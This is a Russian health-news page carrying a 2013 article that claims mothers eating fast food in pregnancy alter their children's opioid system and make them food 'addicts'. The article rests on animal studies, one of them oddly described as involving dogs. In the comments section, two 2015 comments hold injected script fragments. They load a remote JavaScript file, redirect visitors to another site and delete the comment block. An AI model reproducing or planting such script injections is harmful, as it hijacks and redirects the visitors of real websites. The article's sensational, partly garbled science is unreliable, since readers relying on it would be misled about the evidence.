Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Женщины, налегающие на фа...  >>  Женщины, налегающие на фаст фуд во время беременности, делают наркоманов из своих детей
 
Обратная связь
 

Женщины, налегающие на фаст фуд во время беременности, делают наркоманов из своих детей

Размер шрифта
18 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Иванникова
Здоровье инфо
  • google_analytics: false
  • Нравится

Качество питания беременной женщины имеет огромное значение для нормального роста и развития ребенка. В том числе и в формировании нервных клеток в головном мозге ребенка, что отражается на его способностях в будущем.

 

Фаст фуд вызывает нарушения в опиоидной системе. Опиаты – это особые химические вещества, которые выделяются при потреблении продуктов с высоким содержанием жиров и сахара, и приводят к выбросу дофамина – гормона «счастья». Исследователи обнаружили, что ген, кодирующий выработку одного из ключевых опиоидов –энкефалина, определяется у потомства в зависимости от питания матери во время беременности.

Предыдущие исследования на крысах показали, что у самок крыс, регулярно получавших жирную пищу, чаще рождались дети с наличием такого гена, чем у самок, получавших здоровый корм для животных.

Это исследование подтвердило данные, полученные при изучении состоянии опиоидных рецепторов у щенков. У щенков, рожденных от собак с нездоровым прикормом, рецепторы были менее чувствительны к опиоидам.

Полученные данные приводят к выводу, что дети рожденные от матерей, налегающих на фаст фуд во время беременности и кормления грудью, должны съесть больше жирной и нездоровой пищи, чтобы насытиться.

Они не могут получить удовлетворение от небольших порций и превращаются в «пищевых» наркоманов и сладкоежек. Джессика Гугушеф, одна из врачей-исследователей в Университете Аделаиды, говорит, что полученные результаты позволят информировать беременных женщин о необходимости строго соблюдения рациона питания во время беременности. То, что ест мама, влияет на будущее ее малыша, формирует его пищевые предпочтения и привычки, а значит, может повысить риск развития ожирения и диабета.

Все о беременности, бесплодии и родах в нашем специальном проекте «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Хламидия и беременность. Как защититься?   Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Вакцина, которую должен сделать каждый!  
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Первые шаги вашего малыша
Можно ли подгадать с беременностью?
Герпес и беременность. Как защититься?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.